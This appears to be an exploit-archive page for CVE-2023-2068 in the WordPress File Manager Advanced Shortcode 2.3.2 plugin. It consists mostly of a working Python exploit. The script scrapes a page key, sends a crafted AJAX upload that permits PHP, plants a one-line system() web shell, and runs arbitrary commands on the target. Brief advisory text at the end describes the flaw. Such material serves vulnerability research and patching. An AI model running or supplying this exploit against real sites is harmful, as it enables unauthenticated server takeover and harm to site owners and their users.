Headline
File Manager Advanced Shortcode 2.3.2 Remote Code Execution
File Manager Advanced Shortcode version 2.3.2 suffers from a remote code execution vulnerability.
# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)# Date: 05/31/2023# Exploit Author: Mateus Machado Tesser# Vendor Homepage: https://advancedfilemanager.com/# Version: File Manager Advanced Shortcode 2.3.2# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15# CVE: CVE-2023-2068import requestsimport jsonimport pprintimport sysimport rePROCESS = "\033[1;34;40m[*]\033[0m"SUCCESS = "\033[1;32;40m[+]\033[0m"FAIL = "\033[1;31;40m[-]\033[0m"try: COMMAND = sys.argv[2] IP = sys.argv[1] if len(COMMAND) > 1: pass if IP: pass else: print(f'Use: {sys.argv[0]} IP COMMAND')except: passurl = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panelprint(f"{PROCESS} Searching fmakey")try: r = requests.get(url) raw_fmakey = r.text fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1] if len(fmakey) == 0: print(f"{FAIL} Cannot found fmakey!")except: print(f"{FAIL} Cannot found fmakey!")print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')url = "http://"+IP+"/wp-admin/admin-ajax.php"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"r = requests.post(url, headers=headers, data=data)print(f"{PROCESS} Sending AJAX request to: {url}")if 'errUploadMime' in r.text: print(f'{FAIL} Exploit failed!') sys.exit()elif r.headers['Content-Type'].startswith("text/html"): print(f'{FAIL} Exploit failed! Try to change _fmakey') sys.exit(0)else: print(f'{SUCCESS} Exploit executed with success!')exploited = json.loads(r.text)url = ""print(f'{PROCESS} Getting URL with webshell')for i in exploited["added"]: url = i['url']print(f"{PROCESS} Executing '{COMMAND}'")r = requests.get(url+'?cmd='+COMMAND)print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)Related news
WordPress File Manager Advanced Shortcode 2.3.2 Remote Code Execution
WordPress File Manager Advanced Shortcode plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode. This leads to remote code execution in cases where the allowed MIME type list does not include PHP files. In the worst case, this is available to unauthenticated users, but it also works in an authenticated configuration. Versions 2.3.2 and below are affected. To install the Shortcode plugin File Manager Advanced version 5.0.5 or lower is required to keep the configuration vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system with the same privileges under which the Wordpress web services run.
CVE-2023-2068
The File Manager Advanced Shortcode WordPress plugin through 2.3.2 does not adequately prevent uploading files with disallowed MIME types when using the shortcode. This leads to RCE in cases where the allowed MIME type list does not include PHP files. In the worst case, this is available to unauthenticated users.